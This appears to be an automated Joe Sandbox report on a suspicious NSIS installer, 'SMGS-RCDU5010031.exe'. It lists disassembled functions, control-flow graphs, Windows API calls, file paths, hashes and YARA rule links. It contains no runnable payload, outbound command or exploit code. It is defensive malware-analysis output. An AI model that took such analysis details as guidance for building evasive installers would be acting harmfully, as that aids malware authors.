                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\SMGS-RCDU5010031.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Tilbjelig\diagonallsende\Timebudgetter114$C:\Users\user\AppData\Local\Temp\Tilbjelig\diagonallsende\Timebudgetter114\Davening\Udmeldes$C:\Users\user\Desktop$C:\Users\user\Desktop\SMGS-RCDU5010031.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$Snubbendes Setup$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                                                                                                          • API String ID: 2488574733-54419250
                                                                                                                                                                                                          • Opcode ID: 26eb6f9b16d8ac2476929461e4c221b8d9deac311ccc6cd13137edb9e6a9c942
                                                                                                                                                                                                          • Instruction ID: bc0dc6ca93ec9440221f6a1154d69e62cad873230aa3e7f423b6c7eed9202452
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 26eb6f9b16d8ac2476929461e4c221b8d9deac311ccc6cd13137edb9e6a9c942
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 60D1F470600300ABE710BF759D45B2B3AADEB8074AF51443FF581B62E1DB7D8A458B6E
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00404B2B Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 133 404b2b-404b77 GetDlgItem * 2 134 404d98-404d9f 133->134 135 404b7d-404c11 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 133->135 136 404da1-404db1 134->136 137 404db3 134->137 138 404c20-404c27 DeleteObject 135->138 139 404c13-404c1e SendMessageW 135->139 140 404db6-404dbf 136->140 137->140 141 404c29-404c31 138->141 139->138 142 404dc1-404dc4 140->142 143 404dca-404dd0 140->143 144 404c33-404c36 141->144 145 404c5a-404c5e 141->145 142->143 146 404eae-404eb5 142->146 149 404dd2-404dd9 143->149 150 404ddf-404de6 143->150 147 404c38 144->147 148 404c3b-404c58 call 406072 SendMessageW * 2 144->148 145->141 151 404c60-404c8c call 404114 * 2 145->151 152 404f26-404f2e 146->152 153 404eb7-404ebd 146->153 147->148 148->145 149->146 149->150 155 404de8-404deb 150->155 156 404e5b-404e5e 150->156 187 404c92-404c98 151->187 188 404d57-404d6a GetWindowLongW SetWindowLongW 151->188 161 404f30-404f36 SendMessageW 152->161 162 404f38-404f3f 152->162 158 404ec3-404ecd 153->158 159 40510e-405120 call 40417b 153->159 164 404df6-404e0b call 404a79 155->164 165 404ded-404df4 155->165 156->146 160 404e60-404e6a 156->160 158->159 168 404ed3-404ee2 SendMessageW 158->168 170 404e7a-404e84 160->170 171 404e6c-404e78 SendMessageW 160->171 161->162 172 404f41-404f48 162->172 173 404f73-404f7a 162->173 164->156 186 404e0d-404e1e 164->186 165->156 165->164 168->159 178 404ee8-404ef9 SendMessageW 168->178 170->146 180 404e86-404e90 170->180 171->170 181 404f51-404f58 172->181 182 404f4a-404f4b ImageList_Destroy 172->182 176 4050d0-4050d7 173->176 177 404f80-404f8c call 4011ef 173->177 176->159 192 4050d9-4050e0 176->192 205 404f9c-404f9f 177->205 206 404f8e-404f91 177->206 190 404f03-404f05 178->190 191 404efb-404f01 178->191 193 404ea1-404eab 180->193 194 404e92-404e9f 180->194 184 404f61-404f6d 181->184 185 404f5a-404f5b GlobalFree 181->185 182->181 184->173 185->184 186->156 195 404e20-404e22 186->195 196 404c9b-404ca2 187->196 200 404d70-404d74 188->200 198 404f06-404f1f call 401299 SendMessageW 190->198 191->190 191->198 192->159 199 4050e2-40510c ShowWindow GetDlgItem ShowWindow 192->199 193->146 194->146 201 404e24-404e2b 195->201 202 404e35 195->202 203 404d38-404d4b 196->203 204 404ca8-404cd0 196->204 198->152 199->159 208 404d76-404d89 ShowWindow call 404149 200->208 209 404d8e-404d96 call 404149 200->209 211 404e31-404e33 201->211 212 404e2d-404e2f 201->212 215 404e38-404e54 call 40117d 202->215 203->196 219 404d51-404d55 203->219 213 404cd2-404d08 SendMessageW 204->213 214 404d0a-404d0c 204->214 220 404fe0-405004 call 4011ef 205->220 221 404fa1-404fba call 4012e2 call 401299 205->221 216 404f93 206->216 217 404f94-404f97 call 404af9 206->217 208->159 209->134 211->215 212->215 213->203 223 404d0e-404d1d SendMessageW 214->223 224 404d1f-404d35 SendMessageW 214->224 215->156 216->217 217->205 219->188 219->200 235 4050a6-4050ba InvalidateRect 220->235 236 40500a 220->236 241 404fca-404fd9 SendMessageW 221->241 242 404fbc-404fc2 221->242 223->203 224->203 235->176 237 4050bc-4050cb call 404a4c call 404a34 235->237 238 40500d-405018 236->238 237->176 243 40501a-405029 238->243 244 40508e-4050a0 238->244 241->220 245 404fc4 242->245 246 404fc5-404fc8 242->246 248 40502b-405038 243->248 249 40503c-40503f 243->249 244->235 244->238 245->246 246->241 246->242 248->249 251 405041-405044 249->251 252 405046-40504f 249->252 253 405054-40508c SendMessageW * 2 251->253 252->253 254 405051 252->254 253->244 254->253
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404B43
                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000408), ref: 00404B4E
                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B98
                                                                                                                                                                                                          • LoadBitmapW.USER32(0000006E), ref: 00404BAB
                                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000FC,00405123), ref: 00404BC4
                                                                                                                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BD8
                                                                                                                                                                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BEA
                                                                                                                                                                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404C00
                                                                                                                                                                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C0C
                                                                                                                                                                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C1E
                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00404C21
                                                                                                                                                                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C4C
                                                                                                                                                                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C58
                                                                                                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CEE
                                                                                                                                                                                                          • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D19
                                                                                                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D2D
                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404D5C
                                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D6A
                                                                                                                                                                                                          • ShowWindow.USER32(?,00000005), ref: 00404D7B
                                                                                                                                                                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E78
                                                                                                                                                                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EDD
                                                                                                                                                                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EF2
                                                                                                                                                                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F16
                                                                                                                                                                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F36
                                                                                                                                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404F4B
                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00404F5B
                                                                                                                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FD4
                                                                                                                                                                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 0040507D
                                                                                                                                                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040508C
                                                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,?), ref: 004050AC
                                                                                                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 004050FA
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003FE), ref: 00405105
                                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 0040510C
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                          • String ID: $M$N
                                                                                                                                                                                                          • API String ID: 1638840714-813528018
                                                                                                                                                                                                          • Opcode ID: e520d1d30b512afb12423a7735dcee7f53e95ce598d54926476c1ad935aac9f3
                                                                                                                                                                                                          • Instruction ID: 92be4e2f0a71e0becefd48613cebd317121b53e3330ca333a75e7b8088edbb55
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e520d1d30b512afb12423a7735dcee7f53e95ce598d54926476c1ad935aac9f3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 49027FB0900209EFDB209F95DD85AAE7BB5FB84314F10817AF610BA2E1C7799D42CF58
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00406072 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 207stringCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 499 406072-40607d 500 406090-4060a6 499->500 501 40607f-40608e 499->501 502 4060ac-4060b9 500->502 503 4062be-4062c4 500->503 501->500 502->503 506 4060bf-4060c6 502->506 504 4062ca-4062d5 503->504 505 4060cb-4060d8 503->505 507 4062e0-4062e1 504->507 508 4062d7-4062db call 406050 504->508 505->504 509 4060de-4060ea 505->509 506->503 508->507 510 4060f0-40612c 509->510 511 4062ab 509->511 513 406132-40613d GetVersion 510->513 514 40624c-406250 510->514 515 4062b9-4062bc 511->515 516 4062ad-4062b7 511->516 517 406157 513->517 518 40613f-406143 513->518 519 406252-406256 514->519 520 406285-406289 514->520 515->503 516->503 524 40615e-406165 517->524 518->517 521 406145-406149 518->521 522 406266-406273 call 406050 519->522 523 406258-406264 call 405f97 519->523 525 406298-4062a9 lstrlenW 520->525 526 40628b-406293 call 406072 520->526 521->517 527 40614b-40614f 521->527 537 406278-406281 522->537 523->537 529 406167-406169 524->529 530 40616a-40616c 524->530 525->503 526->525 527->517 533 406151-406155 527->533 529->530 535 4061a8-4061ab 530->535 536 40616e-406194 call 405f1d 530->536 533->524 538 4061bb-4061be 535->538 539 4061ad-4061b9 GetSystemDirectoryW 535->539 549 406233-406237 536->549 550 40619a-4061a3 call 406072 536->550 537->525 541 406283 537->541 543 4061c0-4061ce GetWindowsDirectoryW 538->543 544 406229-40622b 538->544 542 40622d-406231 539->542 546 406244-40624a call 4062e4 541->546 542->546 542->549 543->544 544->542 548 4061d0-4061da 544->548 546->525 552 4061f4-40620a SHGetSpecialFolderLocation 548->552 553 4061dc-4061df 548->553 549->546 555 406239-40623f lstrcatW 549->555 550->542 557 406225 552->557 558 40620c-406223 SHGetPathFromIDListW CoTaskMemFree 552->558 553->552 556 4061e1-4061e8 553->556 555->546 560 4061f0-4061f2 556->560 557->544 558->542 558->557 560->542 560->552
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetVersion.KERNEL32(00000000,0042C228,?,004051E6,0042C228,00000000,00000000,0041C400), ref: 00406135
                                                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004061B3
                                                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 004061C6
                                                                                                                                                                                                          • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406202
                                                                                                                                                                                                          • SHGetPathFromIDListW.SHELL32(?,Call), ref: 00406210
                                                                                                                                                                                                          • CoTaskMemFree.OLE32(?), ref: 0040621B
                                                                                                                                                                                                          • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040623F
                                                                                                                                                                                                          • lstrlenW.KERNEL32(Call,00000000,0042C228,?,004051E6,0042C228,00000000,00000000,0041C400), ref: 00406299
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                                                                                                          • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                          • API String ID: 900638850-1230650788
                                                                                                                                                                                                          • Opcode ID: 9ac22be3adfbab36e9e2758bb774a502216386bf045014d88804defae461a58b
                                                                                                                                                                                                          • Instruction ID: 6a0e75f8176bdfaa808a817e977aa907b1c5d4b6119349843486ba00336cef2a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9ac22be3adfbab36e9e2758bb774a502216386bf045014d88804defae461a58b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45611E71A00105ABDF20AF65CC41AEE37A5EF45314F12817FE852BA2D0D73D8AA1CB4D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00405841 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 561 405841-405867 call 405b0c 564 405880-405887 561->564 565 405869-40587b DeleteFileW 561->565 567 405889-40588b 564->567 568 40589a-4058aa call 406050 564->568 566 4059fd-405a01 565->566 569 405891-405894 567->569 570 4059ab-4059b0 567->570 574 4058b9-4058ba call 405a50 568->574 575 4058ac-4058b7 lstrcatW 568->575 569->568 569->570 570->566 572 4059b2-4059b5 570->572 576 4059b7-4059bd 572->576 577 4059bf-4059c7 call 406393 572->577 578 4058bf-4058c3 574->578 575->578 576->566 577->566 585 4059c9-4059dd call 405a04 call 4057f9 577->585 581 4058c5-4058cd 578->581 582 4058cf-4058d5 lstrcatW 578->582 581->582 584 4058da-4058f6 lstrlenW FindFirstFileW 581->584 582->584 586 4059a0-4059a4 584->586 587 4058fc-405904 584->587 601 4059f5-4059f8 call 4051af 585->601 602 4059df-4059e2 585->602 586->570 589 4059a6 586->589 590 405924-405938 call 406050 587->590 591 405906-40590e 587->591 589->570 603 40593a-405942 590->603 604 40594f-40595a call 4057f9 590->604 593 405910-405918 591->593 594 405983-405993 FindNextFileW 591->594 593->590 597 40591a-405922 593->597 594->587 600 405999-40599a FindClose 594->600 597->590 597->594 600->586 601->566 602->576 607 4059e4-4059f3 call 4051af call 405ef1 602->607 603->594 608 405944-40594d call 405841 603->608 614 40597b-40597e call 4051af 604->614 615 40595c-40595f 604->615 607->566 608->594 614->594 617 405961-405971 call 4051af call 405ef1 615->617 618 405973-405979 615->618 617->594 618->594
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • DeleteFileW.KERNELBASE(?,?,75BA3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040586A
                                                                                                                                                                                                          • lstrcatW.KERNEL32(0042F250,\*.*), ref: 004058B2
                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,0040A014), ref: 004058D5
                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,0040A014,?,0042F250,?,?,75BA3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058DB
                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(0042F250,?,?,?,0040A014,?,0042F250,?,?,75BA3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058EB
                                                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 0040598B
                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0040599A
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • "C:\Users\user\Desktop\SMGS-RCDU5010031.exe", xrefs: 00405841
                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040584E
                                                                                                                                                                                                          • \*.*, xrefs: 004058AC
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\SMGS-RCDU5010031.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                                                                                          • API String ID: 2035342205-3179961289
                                                                                                                                                                                                          • Opcode ID: 310f22d1e18abc7c3bbe2dee3bc3119d14cc0d79031cc9c47b9afefb4b25f888
                                                                                                                                                                                                          • Instruction ID: caf420165dc21d0a99f0983ed575dd8be70d76c6b9b5ff92ec706b465e099e4b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 310f22d1e18abc7c3bbe2dee3bc3119d14cc0d79031cc9c47b9afefb4b25f888
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DB41B171800A14EADB21AB65CD49BBF7678EF85764F10423BF801B11D1D77C4A82DE6E
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00406393 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FindFirstFileW.KERNELBASE(75BA3420,00430298,0042FA50,00405B55,0042FA50,0042FA50,00000000,0042FA50,0042FA50,75BA3420,?,C:\Users\user\AppData\Local\Temp\,00405861,?,75BA3420,C:\Users\user\AppData\Local\Temp\), ref: 0040639E
                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 004063AA
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2295610775-0
                                                                                                                                                                                                          • Opcode ID: 395586dc4edb235965e2a282b5d7432a8e50c5a064bd8b1b9b8a05e290e3bc0b
                                                                                                                                                                                                          • Instruction ID: 351587cf9ce3a522800e1c73501a9738d9f8821b35168cd3fdb078f4a7df3edc
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 395586dc4edb235965e2a282b5d7432a8e50c5a064bd8b1b9b8a05e290e3bc0b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C2D012315081209BC34157787E0C84B7B5C9F1A3317259F36F96AF12E1CB348C2286DC
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00404149 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SendMessageW.USER32(00000028,?,?,00403F75), ref: 00404157
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                                          • Opcode ID: 2cd36f0d48dcadf8a0967ef3185ed5b2b885b7484726fb5ce8841cd1b5828a50
                                                                                                                                                                                                          • Instruction ID: 10f0f1b1c79289e67bc844ccbe5aec3c597dbf8b190d8890215e27c6ac549869
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2cd36f0d48dcadf8a0967ef3185ed5b2b885b7484726fb5ce8841cd1b5828a50
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 27B0123A180A00BBDE118B00EE0AF857E62F7AC701F018438B340250F0CAF300E0DB08
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00403C3C Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
